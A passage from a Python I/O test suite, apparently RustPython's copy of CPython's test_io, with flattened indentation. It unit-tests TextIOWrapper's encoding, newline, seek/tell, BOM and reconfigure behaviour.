t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(os_helper.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(os_helper.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(os_helper.TESTFN, "wb") as f:
f.write(line*2)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(os_helper.TESTFN, "wb") as f:
f.write(data)
with self.open(os_helper.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(os_helper.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(os_helper.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(os_helper.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_multibyte_seek_and_tell(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_with_encoder_state(self):
f = self.open(os_helper.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(os_helper.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_bom(self):
# Same test, but when seeking manually
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = os_helper.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(os_helper.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(os_helper.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(os_helper.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(os_helper.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
